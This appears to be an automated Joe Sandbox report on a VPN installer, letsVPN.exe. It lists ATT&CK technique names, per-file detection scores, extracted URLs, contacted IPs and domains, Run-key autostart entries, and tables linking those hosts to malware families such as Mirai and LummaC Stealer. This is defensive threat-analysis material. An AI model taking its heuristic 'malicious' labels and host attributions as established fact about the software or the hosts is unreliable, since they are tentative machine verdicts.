              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol; Exfiltration Over Physical Medium; Exfiltration over USB
              Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption; Resource Hijacking; Network Denial of Service
              Behavior Graph ID: 1582024, Sample: letsVPN.exe, Startdate: 29/12/2024, Architecture: WINDOWS, Score: 60

              Source | Detection | Scanner | Label | Link
              letsVPN.exe | 32% | Virustotal | | Browse
              letsVPN.exe | 100% | Joe Sandbox ML | |
              Source | Detection | Scanner | Label | Link
              C:\Program Files (x86)\letsvpn\LetsPRO.exe | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\Update.exe | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\CommunityToolkit.Mvvm.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\DeltaCompressionDotNet.MsDelta.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\DeltaCompressionDotNet.PatchApi.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\DeltaCompressionDotNet.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\FontAwesome.WPF.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\Hardcodet.Wpf.TaskbarNotification.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\ICSharpCode.AvalonEdit.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\LetsGoogleAnalytics.dll | 3% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\LetsGoogleAnalytics.exe | 3% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe | 3% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\LetsVPNDomainModel.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\LetsVPNInfraStructure.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\MdXaml.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.Analytics.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.Crashes.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Bcl.AsyncInterfaces.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Expression.Interactions.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Toolkit.Uwp.Notifications.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Web.WebView2.Core.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Web.WebView2.WinForms.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Web.WebView2.Wpf.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.Primitives.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.Registry.AccessControl.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.Registry.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.SystemEvents.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Mdb.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Pdb.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Rocks.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\Newtonsoft.Json.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\NuGet.Squirrel.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\PusherClient.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\SQLite-net.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\SQLiteNetExtensions.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\SQLiteNetExtensionsAsync.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.batteries_v2.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.core.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.nativelibrary.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.provider.dynamic_cdecl.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\SVGImage.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\SharpCompress.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\Squirrel.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\SuperSocket.Clientuser.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.AppContext.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Buffers.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.CodeDom.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.Concurrent.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.NonGeneric.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.Specialized.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.Annotations.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.EventBasedAsync.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.Primitives.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.TypeConverter.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Configuration.ConfigurationManager.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Console.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.Common.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.Odbc.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.OleDb.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.SqlClient.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Contracts.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Debug.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.EventLog.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.FileVersionInfo.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.PerformanceCounter.dll | 0% | ReversingLabs | |
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Process.dll | 0% | ReversingLabs | |
              No Antivirus matches
                                      Name   Source   Malicious   Antivirus Detection   Reputation
                                                                                                                                              http://fontawesome.iohttp://fontawesome.io/license/Copyrightletsvpn-latest.exe, 00000015.00000003.2350184994.0000000003107000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claimproperties/attributenameletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://developers.google.com/analytics/devguides/collection/protocol/ga4/user-properties?client_typletsvpn-latest.exe, 00000015.00000003.2357553464.0000000003108000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://rcd.video.sina.com.cn/realtime_pcdesktop?app=pcClient&type=crash&clientType=0&machineCode=sinaplayer_service.exe, sinaplayer_service.exe, 00000013.00000000.2209995817.000000000053D000.00000002.00000001.01000000.0000000B.sdmp, sinaplayer_service.exe, 00000013.00000002.3388043166.000000000053D000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://intercom.help/letsvpn-world/en/collections/1627706-%D0%BF%D0%BE%D0%BC%D0%BE%D1%89%D1%8C-%D1%letsvpn-latest.exe, 00000015.00000003.2540388377.000000000310F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000001B.00000002.2590832104.0000000004876000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://intercom.help/letsvpn-world/en/articles/2780068-%E5%A6%82%E4%BD%95%E4%B8%8B%E8%BD%BD%E5%BE%9letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2551617958.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2550819271.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2559553635.0000000003104000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://1wm27s.onelink.me/DPiD/s5eizipo-1letsvpn-latest.exe, 00000015.00000002.2781360538.0000000000696000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2227804272.000000000275F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCTwhttp://schemas.xmlsoap.org/ws/2005/02/trust/RSTletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://www.xmlspy.com)letsvpn-latest.exe, 00000015.00000003.2405745648.000000000310B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://intercom.help/letsvpn-world/en/articles/2907458-%E6%8F%90%E7%A4%BA%E7%BB%91%E5%AE%9A%E8%AE%Bletsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2551617958.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2550819271.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2559553635.0000000003104000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Cancelletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Cancelletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://docs.oasis-open.org/ws-sx/ws-trust/200512/Issuelhttp://docs.oasis-open.org/ws-sx/ws-trust/200letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://icsharpcode.net/sharpdevelop/avalonedit#ICSharpCode.AvalonEdit.Highlightingletsvpn-latest.exe, 00000015.00000003.2352114533.000000000310F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2009/09/identity/claims/actorletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://rcd.video.sina.com.cn/realtime_pcdesktop?app=pcClient&type=crash&clientType=0&machineCode=httsinaplayer_service.exe, 00000013.00000000.2209995817.000000000053D000.00000002.00000001.01000000.0000000B.sdmp, sinaplayer_service.exe, 00000013.00000002.3388043166.000000000053D000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    http://www.winimage.com/zLibDllnetwork_changesinaplayer_service.exe, 00000013.00000000.2209995817.000000000053D000.00000002.00000001.01000000.0000000B.sdmp, sinaplayer_service.exe, 00000013.00000002.3388043166.000000000053D000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    https://intercom.help/letsvpn-world/en/collections/1628560-help-documentsletsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmp, LetsPRO.exe, 0000003D.00000002.3395428987.00000000024D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://nit.crash1ytics.comhttpCode=-2LetsPRO.exe, 0000003D.00000002.3424803867.000000000EEAE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Validateehttp://schemas.xmlsoap.org/ws/2005/02/trusletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://icsharpcode.net/sharpdevelop/syntaxdefinition/20081Errorletsvpn-latest.exe, 00000015.00000003.2352114533.000000000310F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://defaultcontainer/LetsPRO;component/Themes/RadioButtonDictionary.xamldLetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/ValidateTletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://foo/app.xamldLetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                            unknown
                                                                                                                                                                            http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/Validateletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                              • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
18.136.85.30 | socket-ap1-ingress-1471706552.ap-southeast-1.elb.amazonaws.com | United States | 16509 | AMAZON-02US | false
183.60.146.66 | unknown | China | 134763 | CT-DONGGUAN-IDCCHINANETGuangdongprovincenetworkCN | false
35.227.223.56 | unknown | United States | 15169 | GOOGLEUS | false
103.235.46.96 | www.wshifen.com | Hong Kong | 55967 | BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtd | false
23.98.101.155 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
8.223.59.119 | unknown | Singapore | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | false
8.217.212.245 | unknown | Singapore | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | true
8.223.56.120 | unknown | Singapore | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | false
77.88.55.88 | yandex.com | Russian Federation | 13238 | YANDEXRU | false
13.227.9.24 | d1dmgcawtbm6l9.cloudfront.net | United States | 16509 | AMAZON-02US | false
172.217.21.36 | www.google.com | United States | 15169 | GOOGLEUS | false

IP
127.0.0.1

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1582024
Start date and time: 2024-12-29 16:13:26 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 13m 16s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 76
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: letsVPN.exe
Detection: MAL
Classification: mal60.spre.troj.spyw.evad.winEXE@103/291@9/12
EGA Information:
• Successful, ratio: 83.3%
HCA Information:
• Successful, ratio: 51%
• Number of executed functions: 23
• Number of non-executed functions: 406
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
• Excluded IPs from analysis (whitelisted): 23.218.208.109, 2.16.158.91, 2.16.158.171, 2.16.158.97, 2.16.158.96, 2.16.158.179, 2.16.158.184, 2.16.158.185, 2.16.158.170, 2.16.158.169, 4.153.25.230, 142.250.181.78, 13.107.246.63, 52.149.20.212
• Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, in2-gw2-05-3d6c3051.eastus2.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, e86303.dscx.akamaiedge.net, in-prod-pme-eastus2-ingestion-66ddb56a.trafficmanager.net, ocsp.digicert.com, www.bing.com.edgekey.net, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, www.google-analytics.com
                                                                                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 7632 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                              • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
10:14:20 | API Interceptor | 1x Sleep call for process: letsVPN.exe modified
10:14:21 | API Interceptor | 2x Sleep call for process: svchost.exe modified
10:15:01 | API Interceptor | 15x Sleep call for process: powershell.exe modified
10:15:23 | API Interceptor | 15872x Sleep call for process: LetsPRO.exe modified
16:15:27 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run LetsPRO "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" /silent
16:15:36 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run LetsPRO "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" /silent
Match | Associated Sample Name / URL | Detection | Threat Name | Context
183.60.146.66 | SBSLMD5qhm.msi | malicious | Metasploit |
183.60.146.66 | KLL.exe | malicious | Unknown |
183.60.146.66 | KLL.exe | malicious | Unknown |
183.60.146.66 | KLL.exe | malicious | Unknown |
183.60.146.66 | KLL.exe | malicious | Unknown |
183.60.146.66 | KLL_1.exe | malicious | Unknown |
183.60.146.66 | KLL.exe | malicious | Unknown |
183.60.146.66 | KLL_1.exe | malicious | Unknown |
183.60.146.66 | KLL.exe | malicious | Unknown |
183.60.146.66 | lets-test.msi | malicious | Unknown |
103.235.46.96 | VIP-#U4f1a#U5458#U7248.exe | malicious | BlackMoon | www.baidu.com/
103.235.46.96 | DNF#U604b#U62180224a.exe | malicious | Unknown | www.baidu.com/s?wd=www.cfjuzi.com&rsv_spt=1&issp=1&rsv_bp=0&ie=utf-8&tn=utf8speed_dg&inputT=453
103.235.46.96 | New Al Maktoum International Airport Enquiry Ref #2401249.exe | malicious | FormBook | www.wvufcw948o.top/pt46/?ara=runx2q514acjuuceA0OTyKdTIzcy0YcAOvUMICEfyLgC3vUfTcW2aWKxfLyo5+IB4FDn&D8V=_FNDAz
103.235.46.96 | 4.exe | malicious | BlackMoon | www.baidu.com/
103.235.46.96 | 2.exe | malicious | BlackMoon | www.baidu.com/
103.235.46.96 | 1.exe | malicious | BlackMoon | www.baidu.com/
103.235.46.96 | 3.exe | malicious | BlackMoon, XRed | www.baidu.com/
103.235.46.96 | 1.exe | malicious | BlackMoon | www.baidu.com/
103.235.46.96 | f1.exe | malicious | Unknown | www.baidu.com/
103.235.46.96 | SecuriteInfo.com.FileRepMalware.29184.31872.exe | malicious | Unknown | www.baidu.com/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.wshifen.com | Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnk | malicious | Unknown | 103.235.47.188
www.wshifen.com | 2024-12-10#U67e5#U9605_uninst.exe | malicious | ValleyRAT | 103.235.47.188
www.wshifen.com | 2024-12-10#U67e5#U9605_uninst.exe | malicious | ValleyRAT | 103.235.47.188
www.wshifen.com | Setup.exe | malicious | LummaC Stealer | 103.235.47.188
www.wshifen.com | b6FArHy7yA.exe | malicious | LummaC Stealer | 103.235.47.188
www.wshifen.com | VIP-#U4f1a#U5458#U7248.exe | malicious | BlackMoon | 103.235.46.96
www.wshifen.com | 360safe.exe | malicious | Unknown | 103.235.47.188
www.wshifen.com | XiaobingOnekey.exe | malicious | Unknown | 103.235.46.96
www.wshifen.com | DNF#U604b#U62180224a.exe | malicious | Unknown | 103.235.46.96
www.wshifen.com | http://profdentalcare.com | malicious | Unknown | 103.235.46.96
nal.fqoqehwib.com | SBSLMD5qhm.msi | malicious | Metasploit | 99.34.124.121
nal.fqoqehwib.com | KLL.exe | malicious | Unknown | 5.217.108.181
nal.fqoqehwib.com | KLL.exe | malicious | Unknown | 99.34.124.121
nal.fqoqehwib.com | KLL.exe | malicious | Unknown | 99.34.124.121
nal.fqoqehwib.com | KLL.exe | malicious | Unknown | 5.217.108.181
nal.fqoqehwib.com | KLL_1.exe | malicious | Unknown | 104.112.172.245
nal.fqoqehwib.com | KLL.exe | malicious | Unknown | 5.217.108.181
nal.fqoqehwib.com | KLL_1.exe | malicious | Unknown | 10.176.38.125
nal.fqoqehwib.com | KLL.exe | malicious | Unknown | 104.112.172.245
nal.fqoqehwib.com | lets-test.msi | malicious | Unknown | 104.112.172.245
d1dmgcawtbm6l9.cloudfront.net | SBSLMD5qhm.msi | malicious | Metasploit | 108.138.24.227
d1dmgcawtbm6l9.cloudfront.net | KLL.exe | malicious | Unknown | 18.239.15.26
d1dmgcawtbm6l9.cloudfront.net | KLL.exe | malicious | Unknown | 18.239.15.216
d1dmgcawtbm6l9.cloudfront.net | KLL.exe | malicious | Unknown | 108.138.187.72
d1dmgcawtbm6l9.cloudfront.net | KLL.exe | malicious | Unknown | 18.239.15.44
d1dmgcawtbm6l9.cloudfront.net | KLL_1.exe | malicious | Unknown | 108.138.24.182
d1dmgcawtbm6l9.cloudfront.net | KLL.exe | malicious | Unknown | 108.138.24.227
d1dmgcawtbm6l9.cloudfront.net | KLL_1.exe | malicious | Unknown | 108.138.24.115
d1dmgcawtbm6l9.cloudfront.net | KLL.exe | malicious | Unknown | 108.138.24.115
d1dmgcawtbm6l9.cloudfront.net | lets-test.msi | malicious | Unknown | 3.164.160.102
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CT-DONGGUAN-IDCCHINANETGuangdongprovincenetworkCN | splsh4.elf | malicious | Unknown | 14.17.77.142
CT-DONGGUAN-IDCCHINANETGuangdongprovincenetworkCN | xobftuootu.elf | malicious | Unknown | 183.61.188.99
CT-DONGGUAN-IDCCHINANETGuangdongprovincenetworkCN | sparc.nn.elf | malicious | Mirai, Okiru | 211.99.125.149
CT-DONGGUAN-IDCCHINANETGuangdongprovincenetworkCN | owari.ppc.elf | malicious | Unknown | 211.102.80.218
CT-DONGGUAN-IDCCHINANETGuangdongprovincenetworkCN | jklarm.elf | malicious | Unknown | 183.6.228.171
CT-DONGGUAN-IDCCHINANETGuangdongprovincenetworkCN | j2qv9oE81X.elf | malicious | Mirai | 59.38.96.207
CT-DONGGUAN-IDCCHINANETGuangdongprovincenetworkCN | db0fa4b8db0333367e9bda3ab68b8042.x86.elf | malicious | Mirai, Gafgyt | 14.17.91.101
CT-DONGGUAN-IDCCHINANETGuangdongprovincenetworkCN | 05KN0c1P2J.elf | malicious | Mirai | 14.17.91.116
CT-DONGGUAN-IDCCHINANETGuangdongprovincenetworkCN | SBSLMD5qhm.msi | malicious | Metasploit | 183.60.146.66
CT-DONGGUAN-IDCCHINANETGuangdongprovincenetworkCN | SecuriteInfo.com.Win32.MalwareX-gen.12431.9721.exe | malicious | Unknown | 183.61.168.1
AMAZON-02US | Aqua.x86.elf | malicious | Unknown | 54.171.230.55
                                                                                                                                                                                                  mips64.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                  • 54.171.230.55
                                                                                                                                                                                                  bot.x86_64.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                                                                                                                                                  • 34.249.145.219
                                                                                                                                                                                                  m68k.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                                                  • 54.171.230.55
                                                                                                                                                                                                  armv7l.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                  • 34.254.182.186
                                                                                                                                                                                                  i586.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                  • 54.171.230.55
                                                                                                                                                                                                  bot.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                  • 54.247.62.1
                                                                                                                                                                                                  T1#U52a9#U624b1.0.1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 34.241.209.94
                                                                                                                                                                                                  main_mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                  • 34.249.145.219
                                                                                                                                                                                                  Aqua.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                  • 54.171.230.55
